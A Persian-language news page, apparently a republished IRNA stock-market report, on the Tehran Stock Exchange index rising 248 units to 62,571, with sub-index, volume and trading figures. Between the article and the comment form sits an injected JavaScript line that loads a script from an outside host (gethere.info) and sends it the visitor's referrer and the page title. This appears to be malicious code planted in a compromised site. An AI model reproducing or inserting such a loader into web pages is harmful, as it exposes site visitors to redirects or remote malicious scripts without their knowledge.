چهارشنبه , 26 مهر 1396
خانه / اخبار بورس / اخبار فوری بورس / تالار شیشه ای سبز پوش شد/ رشد 248 واحدی شاخص کل بورس

تالار شیشه ای سبز پوش شد/ رشد 248 واحدی شاخص کل بورس

تهران – ایرنا – شاخص کل بورس و اوراق بهادار در جریان معاملات روز جاری(شنبه) بازار سرمایه با 248 واحد رشد نسبت به روز چهارشنبه هفته گذشته در ارتفاع 62 هزار و 571 واحدی قرار گرفت.

به گزارش روز شنبه ایرنا، شاخص30 شرکت بزرگ 17 واحد، شاخص آزاد شناور472 واحد، بازار اول 256 واحد، بازار دوم 38 واحد و صنعت 97 واحد رشد کردند.

در معاملات امروز شاخص قیمت(وزنی – ارزشی)103 واحد ، شاخص کل(هم وزن) 52 واحد و شاخص قیمت (هم وزن) 46 واحد رشد کردند.

همچنین در معاملات امروز 306 میلیون سهم و حق تقدم به ارزش 49 میلیارد تومان در28 هزار نوبت داد و ستد شد. ارزش روز بازار به 275 هزار میلیارد تومان افزایش یافت.

در معاملات امروز نماد وبملت، رمپنا،وبصادر،مبین، وپاسار و وکار بیشترین تاثیر مثبت و نماد پکرمان بیشترین تاثیر منفی را بر نماگر بازار سرمایه داشتند.

به گزارش واحد تحلیل کارگزاری صباجهاد، اولین روز هفته در حالی در تالار شیشه ای حافظ به پایان رسید که در شروع معاملات شاهد افزایش قیمت در کلیت بازار بودیم اما با گذشت زمان و نزدیک شدن به پایان ساعت معاملات، از هیجان اولیه بازار کاسته شد و معاملات روند متعادل تری بر خود گرفت.

گروه بانکی و خودرویی به ترتیب با 8 و 7 میلیارد تومان، بیشترین ارزش معاملات را به خود اختصاص دادند.

امروز شاهد معامله در بازار آتی سهام نبودیم. در پایان بازار نماد تایرا با 4 میلیارد تومان و نماد فنوال با 6 میلیارد تومان به ترتیب برترین تقاضا در عرضه را به خود اختصاص دادند. همچنین بانک سینا و لاستیک بازار بعد از برگزاری مجامع، امروز به تابلو معاملات بازگشتند.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

پاسخ دهید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *